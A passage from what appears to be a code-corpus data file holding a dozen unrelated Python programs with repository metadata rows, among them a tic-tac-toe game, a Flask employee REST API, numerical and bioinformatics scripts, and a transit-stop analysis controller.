    """Load the cached Minecraft item data, building the cache if missing.

    :param file: Path object to load data from
    :return: dict parsed from the JSON cache
    """
    if not file.is_file():
        # Cache miss: scrape the page and write the cache.
        soup = get_soup()
        enchantment_data = generate_enchantments(soup)
        minecraft_items = generate_items(enchantment_data)
        # BUG FIX: export to ``file`` (previously the module default path
        # was always written, even when a custom ``file`` was requested).
        export_data(minecraft_items, file)
    # BUG FIX: read from ``file`` as well -- the original always opened the
    # module-level json_file, ignoring the argument.
    with file.open() as f:
        json_data = json.loads(f.read())
    # export_data double-encodes the payload, so decode twice.
    return json.loads(json_data)
def parse_html(soup):
    """Extract the enchantment table body as a list of cell-text rows.

    :param soup: BeautifulSoup object
    :return: List of rows (each a list of its <td> texts); the header
        row is dropped.
    """
    table = soup.find("table", {"id": "minecraft_items"})
    rows = []
    for tr in table.find_all("tr"):
        rows.append([cell.get_text() for cell in tr.find_all("td")])
    return rows[1:]
def split_title(title):
    """Split an enchantment title of the form 'Name (id_name)'.

    :param title: String of the enchantment title
    :return: Tuple(id_names, names) -- note the id comes first, and any
        whitespace before the parenthesis stays attached to the name.
    """
    names, id_names = search(r"(.*)\((.*)\)", title).groups()
    return id_names, names
| true |
2013714a4db216942fd0cb496dd009350796d7b8 | Python | snegyeliczky/Python | /tic-tac-to2.py | UTF-8 | 1,022 | 3.546875 | 4 | [] | no_license | import os
import time
import random
board = [" "," "," "," "," "," "," "," "," "," ",]
def print_board():
    """Draw the 3x3 grid from the module-level ``board`` list (slots 1-9)."""
    rows = ((1, 2, 3), (4, 5, 6), (7, 8, 9))
    for n, row in enumerate(rows):
        print(" {} | {} | {} ".format(*(board[i] for i in row)))
        if n < 2:
            print("----|---|----")
def control():
    """Report a win when three consecutive board slots all hold "X".

    Note: as in the original, only runs of three consecutive indices are
    examined (it does not model rows/columns/diagonals separately, and
    only "X" is checked).
    """
    # BUG FIX: stop two short of the end so board[i + 2] cannot run past
    # the list (the original iterated the full length and raised
    # IndexError on the final positions).
    for i in range(len(board) - 2):
        if board[i] == "X" and board[i+1] == "X" and board[i+2] == "X":
            print("X winn that time")
# Main game loop: alternate X and O moves forever (no win/exit condition).
# NOTE(review): an occupied pick for X falls through silently to O's turn,
# and non-numeric input raises ValueError from int().
while True:
    os.system("clear")
    print_board()
    choice = int(input("Please choose an empty space for X: "))
    if board[choice] == " ":
        board[choice] = "X"
        os.system("clear")
        print_board()
        control()  # announces (but does not end on) an X win
    choice = int(input("Please choose an empty space for O: "))
    if board[choice] == " ":
        board[choice] = "O"
        os.system("clear")
        print_board()
    else:
        print("Sorry that is no good")
        time.sleep(1)
| true |
4b6a7236cdeaaf39d23c363e61dfd98312117785 | Python | buc030/parallel_dl_over_tensorflow | /summary_manager.py | UTF-8 | 535 | 2.71875 | 3 | [] | no_license |
import tensorflow as tf
import utils
class SummaryManager:
    """Collects per-iteration TensorFlow summary ops and owns a FileWriter."""
    def __init__(self, path):
        """Create a FileWriter at ``path`` and announce the TensorBoard dir."""
        self.iter_summaries = []
        self.path = path
        self.writer = tf.summary.FileWriter(path)
        utils.printInfo('TensorBoard path: ' + str(path))
    def add_iter_summary(self, s):
        """Queue a summary op to be merged for the current iteration."""
        self.iter_summaries.append(s)
    def merge_iters(self):
        """Merge all queued iteration summaries into a single summary op."""
        #print 'self.iter_summaries = ' + str(self.iter_summaries)
        return tf.summary.merge(self.iter_summaries)
    def reset(self):
        """Drop the queued summaries, ready for the next iteration."""
        self.iter_summaries = []
| true |
63723e11e966b56bd78c738f01efdee540a0bedc | Python | Sevendeadlys/leetcode | /69/mySqrt.py | UTF-8 | 480 | 3.25 | 3 | [] | no_license | class Solution(object):
def mySqrt(self, x):
"""
:type x: int
:rtype: int
"""
num = 2
while (num**2) < x:
num <<= 1
lo = num>>1
hi = num
while lo <= hi:
mid = (lo+hi)/2
midnum = mid**2
if midnum < x:
lo = mid + 1
elif midnum > x:
hi = mid - 1
else :
return mid
return lo-1
| true |
d7d0795dbae72f642de5c1eae940b4f9d3a11c44 | Python | singularity014/Parallel_Computing_Dask | /computations.py | UTF-8 | 1,012 | 3.78125 | 4 | [] | no_license | from memory_check import memory_footprint
import numpy as np
import pandas as pd
# Demo: observe process memory before/after allocating a ~50 MB NumPy
# array, and show that squaring without assignment still allocates a
# temporary.  memory_footprint() presumably reports RSS in MB (defined in
# the project-local memory_check module -- confirm units there).
# To be called before we do any operation
before = memory_footprint()
# Let us create a numpy array which takes 50 MB from memory
N = (1024**2)//8 # number of floats that takes 1 MB memory
x = np.random.randn(N*50) #numpy array which takes 1*50 = 50 MB of memory
after = memory_footprint()
print(f"Memory usage before numpy array creation : {before} MB")
print(f"Memory usage after numpy array creation : {after} MB")
print()
before = memory_footprint()
# Square the numpy array without assigning it back to x
# (the result is a discarded temporary, but it is still allocated).
x**2
after = memory_footprint()
print(f"Memory usage before squaring : {before} MB")
print(f"Memory usage after squaring : {after} MB")
# ------- further checks ------------
# nbytes in numpy tells the memory usage, then we convert it to MB
print(x.nbytes // (1024 **2))
print()
# memory usage of a dataframe of x
df = pd.DataFrame(x)
print(f'{df.memory_usage(index=False)// (1024**2)} MB taken by dataframe')
| true |
e75ca7f8b428cf1bcd70affac9786429ae2ea5d4 | Python | JoseGuillermoAraya/03Tarea | /Van.py | UTF-8 | 2,780 | 3.328125 | 3 | [
"MIT"
] | permissive | #! /usr/bin/env python
'''Script que realiza RK3 para integrar la ecuación de van der Pol
y grafica el resultado'''
import numpy as np
import matplotlib.pyplot as plt
mu=1.844 #'''parametro de la ecuacion'''
def f (y,m):
'''funcion a la que se le aplica RK3'''
return (m,-y-mu*(y**2-1)*m)
def get_k1(y_n,m_n,h,f):
'''calculo de k1'''
f_n = f(y_n,m_n)
return h*f_n[0],h*f_n[1]
def get_k2(y_n,m_n,h,f):
'''calculo de k2'''
k1 = get_k1(y_n,m_n,h,f)
f_n = f(y_n+k1[0]/2.,m_n+k1[1]/2.)
return k1,(h*f_n[0],h*f_n[1])
def get_k3(y_n,m_n,h,f):
'''calculo de k3'''
k1,k2 = get_k2(y_n,m_n,h,f)
f_n = f(y_n-k1[0]+2*k2[0],m_n-k1[1]+2*k2[1])
return k1,k2,(h*f_n[0],h*f_n[1])
def avanzar_rk3 (y_n,m_n,h,f):
'''recibe los valores en el paso n-esimo de "y" y "m"
y retorna los valores en el paso siguiente'''
k1,k2,k3 = get_k3(y_n,m_n,h,f)
y_n1 = y_n + 1./6. * (k1[0]+4*k2[0]+k3[0])
m_n1 = m_n + 1./6. * (k1[1]+4*k2[1]+k3[1])
return y_n1,m_n1
'''-------------------------------------------------------------------------------------------'''
'''condiciones iniciales m0=0 y0=0.1'''
m0 = 0
y0 = 0.1
n_pasos = 1000
h = 20*np.pi / n_pasos
y_1 = np.zeros(n_pasos)
m_1 = np.zeros(n_pasos)
y_1[0] = y0
m_1[0] = m0
for i in range(1,n_pasos):
(y_1[i],m_1[i]) = avanzar_rk3(y_1[i-1],m_1[i-1],h,f)
plt.figure(1)
plt.clf
plt.subplot(311)
plt.plot(y_1,m_1,color="r",label="condiciones iniciales: dy/ds=0, y=0.1")
plt.xlabel('$y$', fontsize=20)
plt.ylabel("$\\frac{dy}{ds}$",fontsize=20)
plt.legend(loc='lower right',prop={'size':10})
plt.title("Trayectoria oscilador de Van der Pol")
'''condiciones iniciales m0=0 y0=4'''
m0 = 0
y0 = 4
n_pasos = 1000
h = 20*np.pi / n_pasos
y_2 = np.zeros(n_pasos)
m_2 = np.zeros(n_pasos)
y_2[0] = y0
m_2[0] = m0
for i in range(1,n_pasos):
(y_2[i],m_2[i]) = avanzar_rk3(y_2[i-1],m_2[i-1],h,f)
plt.subplot(312)
plt.plot(y_2,m_2,color="g",label="condiciones iniciales: dy/ds=0, y=4")
plt.xlabel('$y$', fontsize=20)
plt.ylabel("$\\frac{dy}{ds}$",fontsize=20)
plt.legend(loc='lower right',prop={'size':10})
plt.subplot(313)
plt.plot(y_2,m_2,color="g",label="condiciones iniciales: dy/ds=0, y=4")
plt.plot(y_1,m_1,color="r",label="condiciones iniciales: dy/ds=0, y=0.1")
plt.xlabel('$y$', fontsize=20)
plt.ylabel("$\\frac{dy}{ds}$",fontsize=20)
plt.legend(loc='lower right',prop={'size':10})
plt.savefig("van.png")
s_values=np.linspace(1,20*np.pi,n_pasos)
plt.figure(2)
plt.subplot(211)
plt.title("y(s) para condiciones iniciales: dy/ds=0, y=0.1")
plt.plot(s_values,y_1,color="r")
plt.ylabel("y(s)")
plt.subplot(212)
plt.title("y(s) para condiciones iniciales: dy/ds=0, y=4")
plt.plot(s_values,y_2,color="g")
plt.xlabel("s")
plt.ylabel("y(s)")
plt.savefig("van2.png")
plt.show()
| true |
1bdb9503850c872b4e07ee72dd47332468be961a | Python | CTRU/HIVE-nipple | /NG_work/Scripts/Seq_varifind/seq_varfind.py | UTF-8 | 1,737 | 2.765625 | 3 | [] | no_license | #!/users/Nick/anaconda/bin/python
import re
from Bio.Alphabet import generic_dna, generic_protein
from Bio import SeqIO
import sys
import pprint
import csv
pp = pprint.PrettyPrinter(width=1)
file = str(sys.argv[1])
def compare_seqs(seq1, seq2):
    """List the mismatches between two equal-length sequences.

    Returns a comma-joined string of "a-b [pos]" entries with 1-based
    positions, or the empty string when the sequences agree.
    """
    mismatches = [
        "%s-%s [%d]" % (seq1[pos], seq2[pos], pos + 1)
        for pos in range(len(seq1))
        if seq1[pos] != seq2[pos]
    ]
    return ",".join(mismatches)
# -----------------------------------------------------------------------------------------------
# Compare every FASTA record against the first one (the reference),
# collect the per-record mutation strings, tally identical mutation
# patterns, and write the counts to <input>_mutation_count.csv.
# NOTE: Python 2 script (print statement, 'rU' open mode).
reference_sequence = ""
reference_name = ""
diff_found = []
for record in SeqIO.parse(open(file, 'rU'), 'fasta', generic_protein):
    # Strip the numeric framing from ids like 123_456_7#8_9 -> 456_7#8.
    record_id = re.sub(r'\d+_(\d+_\d\#\d+)_\d+', r'\1', record.id)
    difference_count = []
    same_count = 0
    if ( not reference_sequence ):
        # First record becomes the reference (it compares equal to itself).
        reference_sequence = record.seq
        reference_name = record_id
    #print ",".join([reference_name, record_id, compare_seqs(reference_sequence, record.seq)])
    diff_found.append(compare_seqs(reference_sequence, record.seq))
# else :
#     difference_count.append("Same_as_reference") !!!! TRYING TO APPEND TO LIST TO COUNT SAME SEQS !!!!!
print diff_found # prints the list generated!
# ---------------------------------------------------------------------------------------------
# Tally how often each mutation pattern occurs (collections.Counter would
# do the same in one line).
mutdic = {}
for mutation in diff_found :
    if mutation in mutdic :
        mutdic[mutation] += 1
    else :
        mutdic[mutation] = 1
# ---------------------------------------------------------------------------------------------
outfile = csv.writer(open(file + "_mutation_count.csv", "w"))
for key, value in mutdic.items():
    outfile.writerow([key,value])
exit()
| true |
326c91d1f026e54aa60f417cda803ef47a9fc60b | Python | frolkin28/epam_gw | /dep_app/service/service.py | UTF-8 | 4,246 | 2.6875 | 3 | [] | no_license | '''Module for rest api resources'''
from datetime import datetime
from flask_restful import Resource, reqparse
from dep_app.models.models import Departments, Employees
from dep_app.service.schemas import DepartmentsSchema, EmployeesSchema
from dep_app import db
from sqlalchemy.sql import func
from sqlalchemy import and_
parser1 = reqparse.RequestParser()
parser1.add_argument('id')
parser1.add_argument('title')
class AverageSalary(Resource):
    '''Rest api resource, which returns information about average salary for each department'''
    def get(self):
        """Return a mapping of department id -> average employee salary (HTTP 200).

        Departments with no employees (NULL average) are omitted from the result.
        """
        dep = Departments.query.all()
        salary = dict()
        for i in dep:
            # One aggregate query per department; func.avg yields None when
            # the department has no employees.
            average = Employees.query.with_entities(func.avg(Employees.salary)).filter(
                (Employees.dep_id == i.id)).first()
            if average[0]:
                salary[i.id] = average[0]
        return salary, 200
class DepartmentManagement(Resource):
    '''Rest api resource, which provides CRUD operation with departments database table'''
    def get(self, id=None, title=None):
        """Return one department by id, one by exact title, or all departments
        when neither argument is given (HTTP 200)."""
        if id:
            department = Departments.query.get(id)
            department_schema = DepartmentsSchema()
        elif title:
            department = Departments.query.filter(Departments.title == title).first()
            department_schema = DepartmentsSchema()
        else:
            department = Departments.query.all()
            department_schema = DepartmentsSchema(many=True)
        res = department_schema.dump(department)
        return res, 200
    def post(self):
        """Create a department from the request's 'title' field (HTTP 201)."""
        args = parser1.parse_args()
        department_schema = DepartmentsSchema()
        department = Departments(title=args['title'])
        db.session.add(department)
        db.session.commit()
        res = department_schema.dump(department)
        return res, 201
    def put(self):
        """Rename the department identified by the request's 'id' field (HTTP 200)."""
        args = parser1.parse_args()
        department_schema = DepartmentsSchema()
        department = Departments.query.get(args['id'])
        department.title = args['title']
        db.session.add(department)
        db.session.commit()
        res = department_schema.dump(department)
        return res, 200
    def delete(self, id):
        """Delete a department and cascade-delete all of its employees;
        returns the deleted department's data (HTTP 200)."""
        department_schema = DepartmentsSchema()
        employees = Employees.query.filter(Employees.dep_id == id).all()
        # Manual cascade: remove every employee of the department first
        # (commits once per employee).
        for employee in employees:
            db.session.delete(employee)
            db.session.commit()
        department = Departments.query.get(id)
        res = department_schema.dump(department)
        db.session.delete(department)
        db.session.commit()
        return res, 200
parser2 = reqparse.RequestParser()
parser2.add_argument('id')
parser2.add_argument('name')
parser2.add_argument('dob')
parser2.add_argument('salary')
parser2.add_argument('dep_id')
class EmployeeManagement(Resource):
    '''Rest api resource, which provides CRUD operation with employees database table'''
    def get(self, id=None):
        """Return one employee by id, or all employees when no id is given (HTTP 200)."""
        if id:
            employee = Employees.query.get(id)
            employee_schema = EmployeesSchema()
        else:
            employee = Employees.query.all()
            employee_schema = EmployeesSchema(many=True)
        res = employee_schema.dump(employee)
        return res, 200
    def post(self):
        """Create an employee from request fields; 'dob' must be YYYY-MM-DD (HTTP 201)."""
        args = parser2.parse_args()
        employee_schema = EmployeesSchema()
        employee = Employees(name=args['name'], dob=datetime.strptime(args['dob'], '%Y-%m-%d').date(), \
            salary=args['salary'], dep_id=args['dep_id'])
        db.session.add(employee)
        db.session.commit()
        res = employee_schema.dump(employee)
        return res, 201
    def put(self):
        """Overwrite all fields of the employee identified by 'id' (HTTP 200)."""
        args = parser2.parse_args()
        employee = Employees.query.get(args['id'])
        employee.name = args['name']
        employee.dob = datetime.strptime(args['dob'], '%Y-%m-%d').date()
        employee.salary = args['salary']
        employee.dep_id = args['dep_id']
        db.session.add(employee)
        db.session.commit()
        employee_schema = EmployeesSchema()
        res = employee_schema.dump(employee)
        return res, 200
    def delete(self, id):
        """Delete the employee with the given id; returns the deleted data (HTTP 200)."""
        employee = Employees.query.get(id)
        employee_schema = EmployeesSchema()
        res = employee_schema.dump(employee)
        db.session.delete(employee)
        db.session.commit()
        return res, 200
class Search(Resource):
    """Rest api resource for searching a department's employees by date of birth.

    Two modes: a birth-date range (``fr``/``to``, exclusive bounds) or an
    exact birth date (``dob``).
    """
    def get(self, dep_id=None, fr=None, to=None, dob=None):
        """Return employees of department ``dep_id`` filtered by birth date (HTTP 200).

        :param dep_id: department id to search within
        :param fr: exclusive lower bound of the birth-date range
        :param to: exclusive upper bound of the birth-date range
        :param dob: exact date of birth, used when no complete range is given
        """
        if fr and to:
            employees = Employees.query.filter(Employees.dep_id == dep_id).filter(
                and_(Employees.dob < to, Employees.dob > fr)).all()
        elif dob:
            employees = Employees.query.filter(Employees.dep_id == dep_id).filter(Employees.dob == dob).all()
        else:
            # Bug fix: previously `employees` was left unbound here, so a
            # request without filters raised UnboundLocalError (HTTP 500).
            # Return an empty result set instead.
            employees = []
        employee_schema = EmployeesSchema(many=True)
        res = employee_schema.dump(employees)
        return res, 200
| true |
5ece0b9f42599a01e97faafcade3e18609dfa40a | Python | hussainrifat/Python-Practise | /asd.py | UTF-8 | 390 | 3.703125 | 4 | [] | no_license | A = [1,3,5,7,11,14,15,20,26,31,44,54,56,80,86]
# Classic iterative binary search over the sorted list A (defined just above).
print(A)
number=int(input("Enter the number:"))
low = 0
high = len(A)-1
while low<= high:
    mid = (low + high) // 2
    if A[mid] == number:
        print('Found')
        break
    else:
        # Narrow the window to the half that can still contain the target.
        if number> A[mid]:
            low= mid+1
        else:
            high = mid-1
# The window is only exhausted (low > high) when the target was never found;
# on a successful search the loop breaks before that happens.
if low > high:
    print("Not Found")
7236585e329526e78168b8f32a4a4e1afaa81da8 | Python | RubensBritto/Estrutura_De_Dados | /Tree/main.py | UTF-8 | 9,900 | 3.46875 | 3 | [] | no_license |
# -*- coding: utf-8 -*-
import csv
from os import remove
from tree import BinarySearchTree
from pais import Pais
import random
import os # módulo para acessar o terminal do sistema e poder fazer a limpeza
country = Pais()
tree = BinarySearchTree()
dadosTemp = []
dados = []
def openData():
    """Read datas/2015.csv into the module-level ``dadosTemp`` list, skipping the header row."""
    with open('datas/2015.csv', newline='') as arquivo:
        leitor=csv.reader(arquivo)
        leitor.__next__()  # skip the CSV header row
        for linha in leitor:
            dadosTemp.append(linha)
# saveNewDataCsv - recebe a 3árvore de dados com todas as alterações e manipulações e exportar para outro arquivo csv
def saveNewDataCsv(dadosFinal):
    """Export the fully edited/manipulated data rows to datas/2015_1.csv."""
    with open('datas/2015_1.csv', 'w', newline='') as arquivo_csv:
        csv.writer(arquivo_csv).writerows(dadosFinal)
#Da a opção de ordenação por determinados indices na tree (Rank,Qualidade de vida,Economia)
def ordenar(escolha):
    """Bubble-sort the global ``dados`` list in place by the chosen column and
    insert every row into the global ``tree``.

    escolha == 1 sorts by column 2 (rank, compared as int),
    escolha == 2 sorts by column 5 (economy, compared as float),
    escolha == 3 sorts by column 7 (life expectancy, compared as float).

    Returns (last sort-key value, last rank value) of the sorted data.
    NOTE(review): any other ``escolha`` falls through and returns None; the
    caller unpacks the result, which would raise a TypeError — confirm input
    is restricted to 1-3.
    """
    if escolha == 1:
        # O(n^2) bubble sort keyed on the integer rank column.
        for i in range(len(dados)):
            for j in range(len(dados)-1):
                if int(dados[j][2]) > int(dados[j+1][2]):
                    temp = dados[j]
                    dados[j] = dados[j+1]
                    dados[j+1] = temp
        for i in range(len(dados)):
            tree.insert(dados[i][0],dados[i][1],dados[i][2],dados[i][3],dados[i][4],dados[i][5],dados[i][6],dados[i][7],dados[i][8],dados[i][9],dados[i][10],dados[i][11],escolha)
        return (dados[-1][2], dados[-1][2])
    if escolha == 2:
        # Same bubble sort keyed on the float economy column.
        for i in range(len(dados)):
            for j in range(len(dados)-1):
                if float(str(dados[j][5])) > float(str(dados[j+1][5])):
                    temp = dados[j]
                    dados[j] = dados[j+1]
                    dados[j+1] = temp
        for i in range(len(dados)):
            tree.insert(dados[i][0],dados[i][1],dados[i][2],dados[i][3],dados[i][4],dados[i][5],dados[i][6],dados[i][7],dados[i][8],dados[i][9],dados[i][10],dados[i][11],escolha)
        return (dados[-1][5], dados[-1][2])
    if escolha == 3:
        # Same bubble sort keyed on the float life-expectancy column.
        for i in range(len(dados)):
            for j in range(len(dados)-1):
                if float(str(dados[j][7])) > float(str(dados[j+1][7])):
                    temp = dados[j]
                    dados[j] = dados[j+1]
                    dados[j+1] = temp
        for i in range(len(dados)):
            tree.insert(dados[i][0],dados[i][1],dados[i][2],dados[i][3],dados[i][4],dados[i][5],dados[i][6],dados[i][7],dados[i][8],dados[i][9],dados[i][10],dados[i][11],escolha)
        return (dados[-1][7], dados[-1][2])
def aleatorioData():
    """Pick 100 distinct random rows (indices 1..157) from the global
    ``dadosTemp``, append them to the global ``dados`` list, ask the user how
    to order them, and return (last sort-key, user's choice, last rank).

    NOTE(review): assumes ``dadosTemp`` holds at least 158 rows — confirm
    against the CSV loaded by openData(), otherwise this loops forever or
    raises IndexError.
    """
    k = 0
    visitados = []
    while(k < 100):
        valorAleatorio = random.randint(1,157)
        if valorAleatorio not in visitados:
            visitados.append(valorAleatorio)
            # Append the randomly chosen (not previously visited) row.
            dados.append(dadosTemp[valorAleatorio])
            k+=1
    escolha = int(input("Como deseja ordenar os dados\n1-Rank\n2-Economia\n3- Expectativa de Vida "))
    rt,rank = ordenar(int(escolha))
    return (rt,escolha,rank)
# editarDado - verifica se a chave do país a ser editado existe e permite mudar seus atributos
def editarDado():
try:
id = int(input("Digite o id que deseja editar: "))
if tree.searchHappinessRank(id) == None:
print("Pais Não Existe")
else:
print('Em qual linha/coluna deseja editar um novo dado?\n1 - Pais\n2 - Regiao\n')
print('3 - Indice Felicidade\n5 - Erro Padrão\n6 - Family\n')
print('7 - Indice de liberdade\n8 - Indice de confiança\n9 - Indice de Generosidade\n10 - Distopia Residual')
choose = int(input())
if choose == 1:
editCountry = str(input('Entre com o novo nome do país: '))
if tree.searchCountry(editCountry) != None:
print("Pais já existe")
else:
tree.editarTree(id,editCountry,1)
print("editado")
return
elif choose == 2:
editRegion = str(input('Entre com a novo nome da região: '))
tree.editarTree(id,editRegion,2)
return
elif choose == 3:
editHappinessScore = float(input('Entre com o novo Indice de Felicidade: '))
tree.editarTree(id,editHappinessScore,3)
return
elif choose == 4:
editStandartError = float(input('Entre com o novo Erro Padrão: '))
tree.editarTree(id,editStandartError,4)
return
elif choose == 5:
editFamily = float(input('Entre com o novo indice "Family": '))
tree.editarTree(id,editFamily,5)
return
elif choose == 6:
editFreedom = float(input('Entre com o novo indice de liberdade: '))
tree.editarTree(id,editFreedom,6)
return
elif choose == 7:
editTrust = float(input('Entre com o novo indice de confiança: '))
tree.editarTree(id,editTrust,7)
return
elif choose == 8:
editGenerosity = float(input('Entre com o novo indice "Generosity": '))
tree.editarTree(id,editGenerosity,8)
return
elif choose == 9:
editDystopiaResidual = float(input('Entre com a nova distopia Residual: '))
tree.editarTree(id,editDystopiaResidual,9)
return
except:
print("Erro de Tipo, Tente Novamente")
editarDado()
# start - aqui são oferecidas aos usuários todas as opções disponíveis em um menu interativo
def start(retorno,escolha,rank):
print('Digite a opção desejada\n1-Criar\n2-Editar\n3-Mostrar Tree\n4-Deletar Item\n5-Exportar CSV\n6-Limpar Console\n0-Sair')
choose = int(input())
if choose == 1:
if escolha == 1:
rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual = country.insert(retorno,escolha,rank)
tree.insert(rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual,escolha)
elif escolha == 2:
rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual = country.insert(retorno,escolha,rank)
tree.insert(rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual,escolha)
else:
rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual = country.insert(retorno,escolha,rank)
tree.insert(rtCountry,region,happinessRank,happinessScore,standardError, economy, family, health, freedom, trust, genorosity, dystopiaResidual,escolha)
start(retorno,escolha,rank)
if choose == 2:
id = int(input("Digite o id que deseja editar: "))
if tree.searchHappinessRank(id) == None:
print("Pais Não Existe")
start(retorno,escolha,rank)
id,data,colum = country.editar(id)
tree.editarTree(id,data,colum)
start(retorno,escolha,rank)
if choose == 3:
tree.postorder_traversal()
start(retorno,escolha,rank)
if choose == 4:
if escolha == 1:
print("Exclusão Por ordenação de Rank")
data = int(input("Digite o indice do pais deseja remover: "))
if tree.searchHappinessRank(data) != None:
tree.removeHappinessRank(data)
print("Removido com sucesso")
start(retorno,escolha,rank)
else:
print("Pais não existe")
start(retorno,escolha,rank)
elif escolha == 2:
print("Exclusão Por ordenação de Economia")
data = float(input("Digite o indice de Economia que deseja remover: "))
if tree.searchEconomy(data) != None:
tree.removeEconomy(data)
print("Removido com sucesso")
start(retorno,escolha,rank)
else:
print("Indice não existe")
start(retorno,escolha,rank)
elif escolha == 3:
print("Exclusão Por ordenação de Expectativa de vida")
data = float(input("Digite o indice de Expectativa de vida que deseja remover: "))
if tree.searchHealth(data) != None:
tree.removeHealth(data)
print("Removido com sucesso")
start(retorno,escolha,rank)
else:
print("Indice não existe")
start(retorno,escolha,rank)
else:
print("Opção Inválida")
start(retorno,escolha,rank)
if choose == 5:
dadosFinal = []
i = 1
data = 0
while data != None:
data,j= tree.saveTree(i)
print(data)
if data != None:
dadosFinal.append(data)
i = j
i+=1
saveNewDataCsv(dadosFinal)
start(retorno,escolha,rank)
if choose == 6:
os.system('clear')
start(retorno,escolha,rank)
if choose == 0:
exit()
else:
print("Operação invalida!")
start(retorno,escolha,rank)
def main():
    """Load the CSV, build the tree from 100 random rows, then run the interactive menu."""
    openData()
    retorno,escolha,rank = aleatorioData()
    start(retorno, escolha,rank)
if __name__ == "__main__":
main()
| true |
0d0290af2411383c20f923f6075f5ae36d66ca83 | Python | RaenonX/Madison-Metro-Sim | /msnmetrosim/controllers/stop_at_cross.py | UTF-8 | 5,431 | 2.953125 | 3 | [] | no_license | """Controller of the MMT GTFS stops grouped by its located cross."""
from typing import Dict, Optional, List, Tuple
from msnmetrosim.models import MMTStop, MMTStopsAtCross
from msnmetrosim.models.results import CrossStopRemovalResult
from msnmetrosim.utils import generate_points, Progress
from .base import LocationalDataController
from .population import PopulationDataController
from .stop import MMTStopDataController
__all__ = ("MMTStopsAtCrossDataController",)
class MMTStopsAtCrossDataController(LocationalDataController):
"""Controller of the MMT GTFS stops grouped by its located cross."""
def _init_dict_street(self, stop_data: List[MMTStop]):
# Create an intermediate grouping dict
temp = {}
for stop in stop_data:
cross_id = stop.unique_cross_id
if cross_id not in temp:
temp[cross_id] = []
temp[cross_id].append(stop)
for cross_id, stops in temp.items():
self._dict_street[cross_id] = MMTStopsAtCross(stops[0].primary, stops[0].secondary,
stops[0].wheelchair_accessible, stops)
def __init__(self, stop_data: List[MMTStop]):
self._dict_street: Dict[int, MMTStopsAtCross] = {}
self._init_dict_street(stop_data)
super().__init__(list(self._dict_street.values()))
def get_grouped_stop_by_street_names(self, street_1: str, street_2: str) -> Optional[MMTStopsAtCross]:
"""
Get the stop located at the cross of ``street_1`` and ``street_2``.
Returns ``None`` if not found.
"""
return self._dict_street.get(MMTStopsAtCross.calculate_hash(street_1, street_2))
def get_metrics_of_single_stop_removal(self, street_1: str, street_2: str, agents: List[Tuple[float, float]],
weights: Optional[List[float]] = None) \
-> CrossStopRemovalResult:
"""
Get the accessibility difference metrics of removing a single stop at ``(street_1, street_2)``.
``agents`` is a list of coordinates representing each agent for calculating the distance metrics.
Each ``weight`` corresponds to an ``agent``,
so the length of ``agents`` must equal to the length of ``weights``.
If ``agents`` is ``None``, it will be 1 for all ``agents``.
:raises ValueError: if the length of `coords` and `weights` are not the same
or no stop is located at `(street_1, street_2)`
"""
# Get the stop to be removed
target_stop = self.get_grouped_stop_by_street_names(street_1, street_2)
if not target_stop:
raise ValueError(f"There are no stops located near the cross of {street_1} & {street_2}")
self_no_target = self.duplicate(lambda data: data.unique_cross_id != target_stop.unique_cross_id)
# Get the distance metrics
metrics_before = self.get_distance_metrics_to_closest(
agents, weights=weights, name=f"Before removing {target_stop.cross_name}")
metrics_after = self_no_target.get_distance_metrics_to_closest(
agents, weights=weights, name=f"After removing {target_stop.cross_name}")
return CrossStopRemovalResult(target_stop, metrics_before, metrics_after)
def get_all_stop_remove_results(self, range_km: float, interval_km: float,
pop_data: Optional[PopulationDataController] = None) \
-> List[CrossStopRemovalResult]:
"""
Try to remove each stops one by one, and return the results of the removal.
Specify ``pop_data`` to use the population data instead of dummy agents for calculating the distances.
This function uses ``msnmetrosim.utils.generate_points()``
to generate simulated agents and to calculate the accessibility impact.
The ``center_coord`` of ``msnmetrosim.utils.generate_points()`` will be the coordinates of the stop.
Check the documentation of ``msnmetrosim.utils.generate_points()``
for more information on ``range_km`` and ``interval_km``.
WARNING: This method could be very expensive.
For 1153 records, it takes ~5 mins to run.
"""
# ThreadPoolExecutor won't help on performance boosting
ret: List[CrossStopRemovalResult] = []
total_count = len(self.all_data)
progress = Progress(total_count)
progress.start()
for stop in self.all_data:
stop: MMTStopsAtCross
agents: List[Tuple[float, float]]
weights: Optional[List[float]]
if pop_data:
lat, lon = stop.coordinate
agents, weights = pop_data.get_population_points(lat, lon, range_km, interval_km)
else:
agents = generate_points(stop.coordinate, range_km, interval_km)
weights = None
rm_result = self.get_metrics_of_single_stop_removal(stop.primary, stop.secondary, agents, weights)
ret.append(rm_result)
progress.rec_completed_one()
print(progress)
return ret
@staticmethod
def from_stop_controller(stop_ctrl: MMTStopDataController):
"""Create an :class:`MMTStopsAtCrossDataController` from :class:`MMTStopDataController`."""
return MMTStopsAtCrossDataController(stop_ctrl.all_data)
| true |
9c31c94f6e2116f520febd6f724d99a0af9cabd0 | Python | qingpeng/igs-diversity | /scripts/before-igs/pre_count.py | UTF-8 | 912 | 2.796875 | 3 | [] | no_license | #! /usr/bin/env python2
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2013. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
# using bloom filter to count unique kmers
import khmer
import sys
import screed
from screed.fasta import fasta_iter
# Usage: pre_count.py <fasta file> <k> <hashtable size> <number of hashtables>
filename = sys.argv[1]
K = int(sys.argv[2])  # size of kmer
HT_SIZE = int(sys.argv[3])  # size of hashtable
N_HT = int(sys.argv[4])  # number of hashtables
ht = khmer.new_hashbits(K, HT_SIZE, N_HT)
n_unique = 0
# Slide a window of length K over every sequence; a k-mer not yet present in
# the bloom-filter hashtable counts as unique, then gets recorded.
for n, record in enumerate(fasta_iter(open(filename))):
    sequence = record['sequence']
    seq_len = len(sequence)
    # NOTE(review): this loop variable `n` shadows the enumerate index above.
    for n in range(0, seq_len + 1 - K):
        kmer = sequence[n:n + K]
        if (not ht.get(kmer)):
            n_unique += 1
        ht.count(kmer)
# Report: unique k-mer count, occupied slots, and khmer's own unique estimate.
print n_unique
print ht.n_occupied()
